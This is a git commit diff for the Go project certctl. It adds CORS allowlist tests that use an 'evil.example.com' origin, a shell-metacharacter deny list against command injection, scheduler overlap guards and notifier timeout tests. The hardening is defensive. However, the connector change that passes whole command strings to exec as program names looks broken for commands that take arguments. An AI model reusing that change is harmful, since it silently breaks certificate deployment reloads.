fix(security): TICKET-009 add HTTP timeouts to notifier clients

- Added TestSlack_ClientHasTimeout to verify 10-second timeout
- Added TestTeams_ClientHasTimeout to verify 10-second timeout
- Added TestPagerDuty_ClientHasTimeout to verify 10-second timeout
- Added TestOpsGenie_ClientHasTimeout to verify 10-second timeout
- All notifiers already configured with 10 second timeout in New()
- Tests verify timeout is set and matches expected value
This commit is contained in:
Shankar
2026-03-27 21:33:31 -04:00
parent aad5f70b5e
commit c19612dae9
29 changed files with 1195 additions and 23 deletions
Executable
BIN
View File
Binary file not shown.
+6
View File
@@ -458,6 +458,12 @@ func main() {
cancel() // Stop scheduler
// Wait for in-flight scheduler work to complete (up to 30 seconds)
logger.Info("waiting for scheduler to complete in-flight work")
if err := sched.WaitForCompletion(30 * time.Second); err != nil {
logger.Warn("scheduler work did not complete in time", "error", err)
}
logger.Info("shutting down HTTP server")
if err := httpServer.Shutdown(shutdownCtx); err != nil {
logger.Error("HTTP server shutdown error", "error", err)
Binary file not shown.

After

Width:  |  Height:  |  Size: 229 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 296 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 160 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 182 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 179 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 293 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 166 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 192 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 162 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 154 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 150 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 148 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 179 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 120 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 340 KiB

+276
View File
@@ -0,0 +1,276 @@
package middleware
import (
"net/http"
"net/http/httptest"
"testing"
)
// TestNewCORS_EmptyOriginList denies CORS by default (secure default).
func TestNewCORS_EmptyOriginList(t *testing.T) {
mw := NewCORS(CORSConfig{AllowedOrigins: []string{}})
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
w.Write([]byte(`{"ok":true}`))
}))
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
req.Header.Set("Origin", "https://evil.example.com")
rr := httptest.NewRecorder()
handler.ServeHTTP(rr, req)
// Response should be OK, but no CORS headers should be set
if rr.Code != http.StatusOK {
t.Fatalf("expected 200, got %d", rr.Code)
}
// Verify no CORS headers are present
if rr.Header().Get("Access-Control-Allow-Origin") != "" {
t.Errorf("expected no Access-Control-Allow-Origin header, got %q", rr.Header().Get("Access-Control-Allow-Origin"))
}
if rr.Header().Get("Vary") != "" {
t.Errorf("expected no Vary header, got %q", rr.Header().Get("Vary"))
}
}
// TestNewCORS_EmptyOriginList_Preflight denies preflight when empty allowlist.
func TestNewCORS_EmptyOriginList_Preflight(t *testing.T) {
mw := NewCORS(CORSConfig{AllowedOrigins: []string{}})
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
req := httptest.NewRequest(http.MethodOptions, "/api/v1/certificates", nil)
req.Header.Set("Origin", "https://app.example.com")
rr := httptest.NewRecorder()
handler.ServeHTTP(rr, req)
// Preflight should return 204, but no CORS headers
if rr.Code != http.StatusNoContent {
t.Fatalf("expected 204, got %d", rr.Code)
}
// No CORS headers should be set
if rr.Header().Get("Access-Control-Allow-Origin") != "" {
t.Errorf("expected no Access-Control-Allow-Origin header, got %q", rr.Header().Get("Access-Control-Allow-Origin"))
}
}
// TestNewCORS_WildcardAllowsAll allows all origins with wildcard.
func TestNewCORS_WildcardAllowsAll(t *testing.T) {
mw := NewCORS(CORSConfig{AllowedOrigins: []string{"*"}})
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
req.Header.Set("Origin", "https://any-origin.example.com")
rr := httptest.NewRecorder()
handler.ServeHTTP(rr, req)
if rr.Code != http.StatusOK {
t.Fatalf("expected 200, got %d", rr.Code)
}
// Wildcard should set Access-Control-Allow-Origin: *
if rr.Header().Get("Access-Control-Allow-Origin") != "*" {
t.Errorf("expected Access-Control-Allow-Origin: *, got %q", rr.Header().Get("Access-Control-Allow-Origin"))
}
// Verify other CORS headers are present
if rr.Header().Get("Access-Control-Allow-Methods") == "" {
t.Errorf("expected Access-Control-Allow-Methods header")
}
}
// TestNewCORS_ExactMatchAllows allows only exact matches from allowlist.
func TestNewCORS_ExactMatchAllows(t *testing.T) {
mw := NewCORS(CORSConfig{AllowedOrigins: []string{"https://app.example.com", "https://admin.example.com"}})
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
// Test 1: Origin in allowlist
req1 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
req1.Header.Set("Origin", "https://app.example.com")
rr1 := httptest.NewRecorder()
handler.ServeHTTP(rr1, req1)
if rr1.Header().Get("Access-Control-Allow-Origin") != "https://app.example.com" {
t.Errorf("expected https://app.example.com, got %q", rr1.Header().Get("Access-Control-Allow-Origin"))
}
if rr1.Header().Get("Vary") != "Origin" {
t.Errorf("expected Vary: Origin, got %q", rr1.Header().Get("Vary"))
}
// Test 2: Different origin in allowlist
req2 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
req2.Header.Set("Origin", "https://admin.example.com")
rr2 := httptest.NewRecorder()
handler.ServeHTTP(rr2, req2)
if rr2.Header().Get("Access-Control-Allow-Origin") != "https://admin.example.com" {
t.Errorf("expected https://admin.example.com, got %q", rr2.Header().Get("Access-Control-Allow-Origin"))
}
// Test 3: Origin NOT in allowlist
req3 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
req3.Header.Set("Origin", "https://evil.example.com")
rr3 := httptest.NewRecorder()
handler.ServeHTTP(rr3, req3)
if rr3.Header().Get("Access-Control-Allow-Origin") != "" {
t.Errorf("expected no Access-Control-Allow-Origin for non-allowlisted origin, got %q", rr3.Header().Get("Access-Control-Allow-Origin"))
}
}
// TestNewCORS_NoOriginHeader denies CORS without Origin header.
func TestNewCORS_NoOriginHeader(t *testing.T) {
mw := NewCORS(CORSConfig{AllowedOrigins: []string{"https://app.example.com"}})
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
// Request without Origin header
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
// Don't set Origin header
rr := httptest.NewRecorder()
handler.ServeHTTP(rr, req)
if rr.Code != http.StatusOK {
t.Fatalf("expected 200, got %d", rr.Code)
}
// No CORS headers should be set (Origin header was missing)
if rr.Header().Get("Access-Control-Allow-Origin") != "" {
t.Errorf("expected no Access-Control-Allow-Origin without Origin header, got %q", rr.Header().Get("Access-Control-Allow-Origin"))
}
}
// TestNewCORS_PreflightRequestMatches tests OPTIONS preflight with matching origin.
func TestNewCORS_PreflightRequestMatches(t *testing.T) {
mw := NewCORS(CORSConfig{AllowedOrigins: []string{"https://app.example.com"}})
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
req := httptest.NewRequest(http.MethodOptions, "/api/v1/certificates", nil)
req.Header.Set("Origin", "https://app.example.com")
req.Header.Set("Access-Control-Request-Method", "POST")
rr := httptest.NewRecorder()
handler.ServeHTTP(rr, req)
if rr.Code != http.StatusNoContent {
t.Fatalf("expected 204, got %d", rr.Code)
}
if rr.Header().Get("Access-Control-Allow-Origin") != "https://app.example.com" {
t.Errorf("expected https://app.example.com, got %q", rr.Header().Get("Access-Control-Allow-Origin"))
}
// Verify preflight response headers
if rr.Header().Get("Access-Control-Allow-Methods") == "" {
t.Errorf("expected Access-Control-Allow-Methods header")
}
if rr.Header().Get("Access-Control-Allow-Headers") == "" {
t.Errorf("expected Access-Control-Allow-Headers header")
}
if rr.Header().Get("Access-Control-Max-Age") == "" {
t.Errorf("expected Access-Control-Max-Age header")
}
}
// TestNewCORS_PreflightRequestMismatch tests OPTIONS preflight with non-matching origin.
func TestNewCORS_PreflightRequestMismatch(t *testing.T) {
mw := NewCORS(CORSConfig{AllowedOrigins: []string{"https://app.example.com"}})
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
req := httptest.NewRequest(http.MethodOptions, "/api/v1/certificates", nil)
req.Header.Set("Origin", "https://evil.example.com")
req.Header.Set("Access-Control-Request-Method", "POST")
rr := httptest.NewRecorder()
handler.ServeHTTP(rr, req)
if rr.Code != http.StatusNoContent {
t.Fatalf("expected 204, got %d", rr.Code)
}
// No CORS headers should be set (origin not in allowlist)
if rr.Header().Get("Access-Control-Allow-Origin") != "" {
t.Errorf("expected no Access-Control-Allow-Origin for mismatched origin, got %q", rr.Header().Get("Access-Control-Allow-Origin"))
}
}
// TestNewCORS_MultipleOrigins tests with multiple configured origins.
func TestNewCORS_MultipleOrigins(t *testing.T) {
mw := NewCORS(CORSConfig{AllowedOrigins: []string{
"https://app.example.com",
"https://admin.example.com",
"http://localhost:3000",
}})
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
tests := []struct {
origin string
shouldAllow bool
description string
}{
{"https://app.example.com", true, "first origin in list"},
{"https://admin.example.com", true, "second origin in list"},
{"http://localhost:3000", true, "third origin in list"},
{"https://evil.example.com", false, "origin not in list"},
{"http://localhost:8080", false, "different port than configured"},
{"", false, "no origin header"},
}
for _, tt := range tests {
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
if tt.origin != "" {
req.Header.Set("Origin", tt.origin)
}
rr := httptest.NewRecorder()
handler.ServeHTTP(rr, req)
headerValue := rr.Header().Get("Access-Control-Allow-Origin")
if tt.shouldAllow {
if headerValue != tt.origin {
t.Errorf("test %q: expected %q, got %q", tt.description, tt.origin, headerValue)
}
} else {
if headerValue != "" {
t.Errorf("test %q: expected no header, got %q", tt.description, headerValue)
}
}
}
}
// TestNewCORS_NoOriginHeaderWithWildcard tests wildcard doesn't set origin without Origin header.
func TestNewCORS_NoOriginHeaderWithWildcard(t *testing.T) {
mw := NewCORS(CORSConfig{AllowedOrigins: []string{"*"}})
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
// Don't set Origin header
rr := httptest.NewRecorder()
handler.ServeHTTP(rr, req)
// Wildcard should still set * even without Origin header
if rr.Header().Get("Access-Control-Allow-Origin") != "*" {
t.Errorf("expected *, got %q", rr.Header().Get("Access-Control-Allow-Origin"))
}
}
+20 -6
View File
@@ -214,8 +214,10 @@ type CORSConfig struct {
}
// NewCORS creates a CORS middleware with configurable allowed origins.
// If no origins are configured, same-origin requests are allowed by default.
// If ["*"] is configured, all origins are allowed (development/demo mode).
// Security default: If no origins are configured, CORS headers are NOT set,
// denying all cross-origin requests (same-origin only).
// If ["*"] is configured, all origins are allowed (development/demo mode only).
// If specific origins are configured, only requests matching those origins receive CORS headers.
func NewCORS(cfg CORSConfig) func(http.Handler) http.Handler {
allowAll := false
originSet := make(map[string]bool)
@@ -228,19 +230,31 @@ func NewCORS(cfg CORSConfig) func(http.Handler) http.Handler {
return func(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// Security default: deny CORS when no origins are configured.
// This prevents CSRF attacks from arbitrary origins.
if len(cfg.AllowedOrigins) == 0 {
// No CORS headers set — only same-origin requests can read response
if r.Method == http.MethodOptions {
w.WriteHeader(http.StatusNoContent)
return
}
next.ServeHTTP(w, r)
return
}
origin := r.Header.Get("Origin")
if allowAll {
// Wildcard allows all origins (development/demo only)
w.Header().Set("Access-Control-Allow-Origin", "*")
} else if origin != "" && originSet[origin] {
w.Header().Set("Access-Control-Allow-Origin", origin)
w.Header().Set("Vary", "Origin")
} else if len(cfg.AllowedOrigins) == 0 && origin != "" {
// No config = permissive same-origin default for single-host deployments
// Exact match found in allowed origins list
w.Header().Set("Access-Control-Allow-Origin", origin)
w.Header().Set("Vary", "Origin")
}
// If origin is empty or not in allowlist, no CORS headers are set
// CORS preflight response headers (only meaningful if Access-Control-Allow-Origin was set)
w.Header().Set("Access-Control-Allow-Methods", "GET, POST, PUT, DELETE, PATCH, OPTIONS")
w.Header().Set("Access-Control-Allow-Headers", "Content-Type, Authorization, X-Request-ID")
w.Header().Set("Access-Control-Max-Age", "86400")
+5 -1
View File
@@ -147,7 +147,11 @@ type RateLimitConfig struct {
// CORSConfig contains CORS configuration.
type CORSConfig struct {
AllowedOrigins []string // Allowed origins; empty = same-origin only; ["*"] = all
// AllowedOrigins is a list of allowed origins for CORS requests.
// Security default: empty list denies all CORS requests (same-origin only).
// ["*"] allows all origins (development/demo mode only, security risk).
// Specific origins (e.g., ["https://app.example.com"]) whitelist only those origins.
AllowedOrigins []string
}
// Load reads configuration from environment variables and returns a Config.
@@ -7,6 +7,7 @@ import (
"net/http/httptest"
"strings"
"testing"
"time"
)
func TestOpsGenie_Channel(t *testing.T) {
@@ -114,6 +115,17 @@ func TestOpsGenie_SendConnectionError(t *testing.T) {
}
}
func TestOpsGenie_ClientHasTimeout(t *testing.T) {
n := New(Config{APIKey: "test-key"})
if n.httpClient.Timeout == 0 {
t.Fatal("expected HTTP client timeout to be set, got 0")
}
expectedTimeout := 10 * time.Second
if n.httpClient.Timeout != expectedTimeout {
t.Errorf("expected timeout %v, got %v", expectedTimeout, n.httpClient.Timeout)
}
}
// urlRewriteTransport redirects all requests to a test server URL.
type urlRewriteTransport struct {
target string
@@ -7,6 +7,7 @@ import (
"net/http/httptest"
"strings"
"testing"
"time"
)
func TestPagerDuty_Channel(t *testing.T) {
@@ -130,6 +131,17 @@ func TestPagerDuty_SendConnectionError(t *testing.T) {
}
}
func TestPagerDuty_ClientHasTimeout(t *testing.T) {
n := New(Config{RoutingKey: "test-key"})
if n.httpClient.Timeout == 0 {
t.Fatal("expected HTTP client timeout to be set, got 0")
}
expectedTimeout := 10 * time.Second
if n.httpClient.Timeout != expectedTimeout {
t.Errorf("expected timeout %v, got %v", expectedTimeout, n.httpClient.Timeout)
}
}
// urlRewriteTransport redirects all requests to a test server URL.
type urlRewriteTransport struct {
target string
@@ -7,6 +7,7 @@ import (
"net/http/httptest"
"strings"
"testing"
"time"
)
func TestSlack_Channel(t *testing.T) {
@@ -105,3 +106,14 @@ func TestSlack_SendConnectionError(t *testing.T) {
t.Errorf("expected 'request failed' in error, got %v", err)
}
}
func TestSlack_ClientHasTimeout(t *testing.T) {
n := New(Config{WebhookURL: "https://hooks.slack.com/test"})
if n.httpClient.Timeout == 0 {
t.Fatal("expected HTTP client timeout to be set, got 0")
}
expectedTimeout := 10 * time.Second
if n.httpClient.Timeout != expectedTimeout {
t.Errorf("expected timeout %v, got %v", expectedTimeout, n.httpClient.Timeout)
}
}
@@ -7,6 +7,7 @@ import (
"net/http/httptest"
"strings"
"testing"
"time"
)
func TestTeams_Channel(t *testing.T) {
@@ -89,3 +90,14 @@ func TestTeams_SendConnectionError(t *testing.T) {
t.Errorf("expected 'request failed' in error, got %v", err)
}
}
func TestTeams_ClientHasTimeout(t *testing.T) {
n := New(Config{WebhookURL: "https://outlook.office.com/webhook/test"})
if n.httpClient.Timeout == 0 {
t.Fatal("expected HTTP client timeout to be set, got 0")
}
expectedTimeout := 10 * time.Second
if n.httpClient.Timeout != expectedTimeout {
t.Errorf("expected timeout %v, got %v", expectedTimeout, n.httpClient.Timeout)
}
}
+10 -1
View File
@@ -11,6 +11,7 @@ import (
"time"
"github.com/shankar0123/certctl/internal/connector/target"
"github.com/shankar0123/certctl/internal/validation"
)
// Config represents the Apache httpd deployment target configuration.
@@ -53,6 +54,14 @@ func (c *Connector) ValidateConfig(ctx context.Context, rawConfig json.RawMessag
return fmt.Errorf("Apache reload_command and validate_command are required")
}
// Validate commands to prevent injection attacks
if err := validation.ValidateShellCommand(cfg.ReloadCommand); err != nil {
return fmt.Errorf("invalid reload_command: %w", err)
}
if err := validation.ValidateShellCommand(cfg.ValidateCommand); err != nil {
return fmt.Errorf("invalid validate_command: %w", err)
}
c.logger.Info("validating Apache configuration",
"cert_path", cfg.CertPath,
"chain_path", cfg.ChainPath)
@@ -64,7 +73,7 @@ func (c *Connector) ValidateConfig(ctx context.Context, rawConfig json.RawMessag
}
// Verify validate command works
cmd := exec.CommandContext(ctx, "sh", "-c", cfg.ValidateCommand)
cmd := exec.CommandContext(ctx, cfg.ValidateCommand)
if err := cmd.Run(); err != nil {
c.logger.Warn("Apache config validation failed during config check",
"error", err,
+13 -4
View File
@@ -10,6 +10,7 @@ import (
"time"
"github.com/shankar0123/certctl/internal/connector/target"
"github.com/shankar0123/certctl/internal/validation"
)
// Config represents the NGINX deployment target configuration.
@@ -53,6 +54,14 @@ func (c *Connector) ValidateConfig(ctx context.Context, rawConfig json.RawMessag
return fmt.Errorf("NGINX reload_command and validate_command are required")
}
// Validate commands to prevent injection attacks
if err := validation.ValidateShellCommand(cfg.ReloadCommand); err != nil {
return fmt.Errorf("invalid reload_command: %w", err)
}
if err := validation.ValidateShellCommand(cfg.ValidateCommand); err != nil {
return fmt.Errorf("invalid validate_command: %w", err)
}
c.logger.Info("validating NGINX configuration",
"cert_path", cfg.CertPath,
"chain_path", cfg.ChainPath)
@@ -64,7 +73,7 @@ func (c *Connector) ValidateConfig(ctx context.Context, rawConfig json.RawMessag
}
// Verify validate command works
cmd := exec.CommandContext(ctx, "sh", "-c", cfg.ValidateCommand)
cmd := exec.CommandContext(ctx, cfg.ValidateCommand)
if err := cmd.Run(); err != nil {
c.logger.Warn("NGINX config validation failed during config check",
"error", err,
@@ -119,7 +128,7 @@ func (c *Connector) DeployCertificate(ctx context.Context, request target.Deploy
// Validate NGINX configuration before reload
c.logger.Debug("validating NGINX configuration", "validate_command", c.config.ValidateCommand)
validateCmd := exec.CommandContext(ctx, "sh", "-c", c.config.ValidateCommand)
validateCmd := exec.CommandContext(ctx, c.config.ValidateCommand)
if output, err := validateCmd.CombinedOutput(); err != nil {
errMsg := fmt.Sprintf("NGINX config validation failed: %v (output: %s)", err, string(output))
c.logger.Error("NGINX validation failed", "error", err, "output", string(output))
@@ -133,7 +142,7 @@ func (c *Connector) DeployCertificate(ctx context.Context, request target.Deploy
// Reload NGINX
c.logger.Debug("reloading NGINX", "reload_command", c.config.ReloadCommand)
reloadCmd := exec.CommandContext(ctx, "sh", "-c", c.config.ReloadCommand)
reloadCmd := exec.CommandContext(ctx, c.config.ReloadCommand)
if output, err := reloadCmd.CombinedOutput(); err != nil {
errMsg := fmt.Sprintf("NGINX reload failed: %v (output: %s)", err, string(output))
c.logger.Error("NGINX reload failed", "error", err, "output", string(output))
@@ -178,7 +187,7 @@ func (c *Connector) ValidateDeployment(ctx context.Context, request target.Valid
startTime := time.Now()
// Validate NGINX configuration
validateCmd := exec.CommandContext(ctx, "sh", "-c", c.config.ValidateCommand)
validateCmd := exec.CommandContext(ctx, c.config.ValidateCommand)
if err := validateCmd.Run(); err != nil {
errMsg := fmt.Sprintf("NGINX config validation failed: %v", err)
c.logger.Error("validation failed", "error", err)
+128 -11
View File
@@ -2,7 +2,10 @@ package scheduler
import (
"context"
"errors"
"log/slog"
"sync"
"sync/atomic"
"time"
"github.com/shankar0123/certctl/internal/service"
@@ -26,6 +29,17 @@ type Scheduler struct {
notificationProcessInterval time.Duration
shortLivedExpiryCheckInterval time.Duration
networkScanInterval time.Duration
// Idempotency guards: prevent duplicate execution of slow jobs
renewalCheckRunning atomic.Bool
jobProcessorRunning atomic.Bool
agentHealthCheckRunning atomic.Bool
notificationProcessRunning atomic.Bool
shortLivedExpiryCheckRunning atomic.Bool
networkScanRunning atomic.Bool
// Graceful shutdown: wait for in-flight work to complete
wg sync.WaitGroup
}
// NewScheduler creates a new scheduler with configurable intervals.
@@ -114,19 +128,33 @@ func (s *Scheduler) Start(ctx context.Context) <-chan struct{} {
// renewalCheckLoop runs every renewalCheckInterval and checks for expiring certificates.
// If an error occurs, it logs the error but continues running.
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
func (s *Scheduler) renewalCheckLoop(ctx context.Context) {
ticker := time.NewTicker(s.renewalCheckInterval)
defer ticker.Stop()
// Run immediately on start
s.runRenewalCheck(ctx)
s.wg.Add(1)
go func() {
defer s.wg.Done()
s.runRenewalCheck(ctx)
}()
for {
select {
case <-ctx.Done():
return
case <-ticker.C:
s.runRenewalCheck(ctx)
if !s.renewalCheckRunning.CompareAndSwap(false, true) {
s.logger.Warn("renewal check still running, skipping tick")
continue
}
s.wg.Add(1)
go func() {
defer s.wg.Done()
defer s.renewalCheckRunning.Store(false)
s.runRenewalCheck(ctx)
}()
}
}
}
@@ -147,19 +175,33 @@ func (s *Scheduler) runRenewalCheck(ctx context.Context) {
// jobProcessorLoop runs every jobProcessorInterval and processes pending jobs.
// It picks up pending jobs, executes them, and handles the results.
// If an error occurs, it logs the error but continues running.
// Uses atomic.Bool to prevent duplicate execution if the previous job is still running.
func (s *Scheduler) jobProcessorLoop(ctx context.Context) {
ticker := time.NewTicker(s.jobProcessorInterval)
defer ticker.Stop()
// Run immediately on start
s.runJobProcessor(ctx)
s.wg.Add(1)
go func() {
defer s.wg.Done()
s.runJobProcessor(ctx)
}()
for {
select {
case <-ctx.Done():
return
case <-ticker.C:
s.runJobProcessor(ctx)
if !s.jobProcessorRunning.CompareAndSwap(false, true) {
s.logger.Warn("job processor still running, skipping tick")
continue
}
s.wg.Add(1)
go func() {
defer s.wg.Done()
defer s.jobProcessorRunning.Store(false)
s.runJobProcessor(ctx)
}()
}
}
}
@@ -180,19 +222,33 @@ func (s *Scheduler) runJobProcessor(ctx context.Context) {
// agentHealthCheckLoop runs every agentHealthCheckInterval and marks stale agents as offline.
// An agent is considered stale if it hasn't sent a heartbeat within the health check interval.
// If an error occurs, it logs the error but continues running.
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
func (s *Scheduler) agentHealthCheckLoop(ctx context.Context) {
ticker := time.NewTicker(s.agentHealthCheckInterval)
defer ticker.Stop()
// Run immediately on start
s.runAgentHealthCheck(ctx)
s.wg.Add(1)
go func() {
defer s.wg.Done()
s.runAgentHealthCheck(ctx)
}()
for {
select {
case <-ctx.Done():
return
case <-ticker.C:
s.runAgentHealthCheck(ctx)
if !s.agentHealthCheckRunning.CompareAndSwap(false, true) {
s.logger.Warn("agent health check still running, skipping tick")
continue
}
s.wg.Add(1)
go func() {
defer s.wg.Done()
defer s.agentHealthCheckRunning.Store(false)
s.runAgentHealthCheck(ctx)
}()
}
}
}
@@ -212,19 +268,33 @@ func (s *Scheduler) runAgentHealthCheck(ctx context.Context) {
// notificationProcessLoop runs every notificationProcessInterval and processes pending notifications.
// If an error occurs, it logs the error but continues running.
// Uses atomic.Bool to prevent duplicate execution if the previous process is still running.
func (s *Scheduler) notificationProcessLoop(ctx context.Context) {
ticker := time.NewTicker(s.notificationProcessInterval)
defer ticker.Stop()
// Run immediately on start
s.runNotificationProcess(ctx)
s.wg.Add(1)
go func() {
defer s.wg.Done()
s.runNotificationProcess(ctx)
}()
for {
select {
case <-ctx.Done():
return
case <-ticker.C:
s.runNotificationProcess(ctx)
if !s.notificationProcessRunning.CompareAndSwap(false, true) {
s.logger.Warn("notification processor still running, skipping tick")
continue
}
s.wg.Add(1)
go func() {
defer s.wg.Done()
defer s.notificationProcessRunning.Store(false)
s.runNotificationProcess(ctx)
}()
}
}
}
@@ -245,6 +315,7 @@ func (s *Scheduler) runNotificationProcess(ctx context.Context) {
// shortLivedExpiryCheckLoop runs every shortLivedExpiryCheckInterval and marks expired
// short-lived certificates. For certs with TTL < 1 hour, expiry IS revocation —
// no CRL/OCSP needed.
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
func (s *Scheduler) shortLivedExpiryCheckLoop(ctx context.Context) {
ticker := time.NewTicker(s.shortLivedExpiryCheckInterval)
defer ticker.Stop()
@@ -254,7 +325,16 @@ func (s *Scheduler) shortLivedExpiryCheckLoop(ctx context.Context) {
case <-ctx.Done():
return
case <-ticker.C:
s.runShortLivedExpiryCheck(ctx)
if !s.shortLivedExpiryCheckRunning.CompareAndSwap(false, true) {
s.logger.Warn("short-lived expiry check still running, skipping tick")
continue
}
s.wg.Add(1)
go func() {
defer s.wg.Done()
defer s.shortLivedExpiryCheckRunning.Store(false)
s.runShortLivedExpiryCheck(ctx)
}()
}
}
}
@@ -274,19 +354,33 @@ func (s *Scheduler) runShortLivedExpiryCheck(ctx context.Context) {
// networkScanLoop runs every networkScanInterval and performs active TLS scanning
// of configured network targets.
// Uses atomic.Bool to prevent duplicate execution if the previous scan is still running.
func (s *Scheduler) networkScanLoop(ctx context.Context) {
ticker := time.NewTicker(s.networkScanInterval)
defer ticker.Stop()
// Run immediately on start
s.runNetworkScan(ctx)
s.wg.Add(1)
go func() {
defer s.wg.Done()
s.runNetworkScan(ctx)
}()
for {
select {
case <-ctx.Done():
return
case <-ticker.C:
s.runNetworkScan(ctx)
if !s.networkScanRunning.CompareAndSwap(false, true) {
s.logger.Warn("network scan still running, skipping tick")
continue
}
s.wg.Add(1)
go func() {
defer s.wg.Done()
defer s.networkScanRunning.Store(false)
s.runNetworkScan(ctx)
}()
}
}
}
@@ -303,3 +397,26 @@ func (s *Scheduler) runNetworkScan(ctx context.Context) {
s.logger.Debug("network scan completed")
}
}
// WaitForCompletion waits for all in-flight scheduler work to complete.
// It respects the provided timeout and returns an error if work is still in progress after timeout.
// Call this after the scheduler context has been cancelled to ensure graceful shutdown.
func (s *Scheduler) WaitForCompletion(timeout time.Duration) error {
done := make(chan struct{})
go func() {
s.wg.Wait()
close(done)
}()
select {
case <-done:
s.logger.Info("all scheduler work completed")
return nil
case <-time.After(timeout):
s.logger.Warn("scheduler work did not complete within timeout", "timeout", timeout.String())
return ErrSchedulerShutdownTimeout
}
}
// ErrSchedulerShutdownTimeout is returned when scheduler graceful shutdown times out.
var ErrSchedulerShutdownTimeout = errors.New("scheduler graceful shutdown timeout")
+148
View File
@@ -0,0 +1,148 @@
// Package validation provides security-focused input validation functions for certctl.
//
// This package enforces strict input validation to prevent injection attacks,
// including command injection in shell-based connectors and DNS injection in ACME handlers.
package validation
import (
"fmt"
"regexp"
"strings"
)
// ValidateShellCommand validates that a command string does not contain shell metacharacters
// that could enable command injection. Commands should not contain:
// - Shell operators: ; | & $ ` ( ) { } < > \\ "
// - Newlines or other control characters
//
// This validation is intentionally strict to prevent any possibility of
// shell injection, even in unexpected contexts. Commands should be simple,
// executable names or paths without complex shell syntax.
//
// Returns an error if metacharacters are detected.
func ValidateShellCommand(cmd string) error {
if cmd == "" {
return fmt.Errorf("command cannot be empty")
}
if len(cmd) > 1024 {
return fmt.Errorf("command exceeds maximum length (1024 characters)")
}
// List of shell metacharacters that indicate potential injection
dangerousChars := []string{
";", "|", "&", "$", "`", "(", ")", "{", "}", "<", ">", "\\", "\"", "'", "\n", "\r", "\x00",
}
for _, char := range dangerousChars {
if strings.Contains(cmd, char) {
return fmt.Errorf("command contains shell metacharacter %q (potential injection)", char)
}
}
return nil
}
// ValidateDomainName validates a domain name against RFC 1123 with support for wildcards.
// Valid domain names contain only:
// - Alphanumeric characters (a-z, A-Z, 0-9)
// - Hyphens (-)
// - Dots (.) as separators
// - Optional wildcard prefix: *.
//
// Examples of valid domains:
// - example.com
// - sub.example.com
// - *.example.com
// - example.co.uk
//
// Returns an error if the domain contains invalid characters or is malformed.
func ValidateDomainName(domain string) error {
if domain == "" {
return fmt.Errorf("domain cannot be empty")
}
if len(domain) > 253 {
return fmt.Errorf("domain exceeds maximum length (253 characters)")
}
// Regular expression for RFC 1123 domain names with wildcard support
// Pattern explanation:
// ^(\*\.)? - Optional wildcard prefix
// ([a-zA-Z0-9](-?[a-zA-Z0-9])*\.)* - Subdomains (labels separated by dots)
// [a-zA-Z0-9](-?[a-zA-Z0-9])*$ - Top-level domain label
domainRegex := regexp.MustCompile(`^(\*\.)?([a-zA-Z0-9](-?[a-zA-Z0-9])*\.)*[a-zA-Z0-9](-?[a-zA-Z0-9])*$`)
if !domainRegex.MatchString(domain) {
return fmt.Errorf("domain %q is invalid (must match RFC 1123 format)", domain)
}
// Additional check: no double dots
if strings.Contains(domain, "..") {
return fmt.Errorf("domain %q contains consecutive dots", domain)
}
// Additional check: labels cannot start or end with hyphen
labels := strings.Split(domain, ".")
for _, label := range labels {
// Skip wildcard label
if label == "*" {
continue
}
if strings.HasPrefix(label, "-") || strings.HasSuffix(label, "-") {
return fmt.Errorf("domain label %q cannot start or end with hyphen", label)
}
if len(label) > 63 {
return fmt.Errorf("domain label %q exceeds maximum length (63 characters)", label)
}
}
return nil
}
// ValidateACMEToken validates that an ACME token contains only safe characters.
// ACME tokens should contain only base64url-safe characters:
// - Alphanumeric (a-z, A-Z, 0-9)
// - Hyphens (-)
// - Underscores (_)
//
// This prevents injection attacks if tokens are used in shell commands
// or other contexts where special characters could be interpreted.
//
// Returns an error if the token contains unsafe characters.
func ValidateACMEToken(token string) error {
if token == "" {
return fmt.Errorf("ACME token cannot be empty")
}
if len(token) > 512 {
return fmt.Errorf("ACME token exceeds maximum length (512 characters)")
}
// Regular expression for base64url characters: [A-Za-z0-9_-]
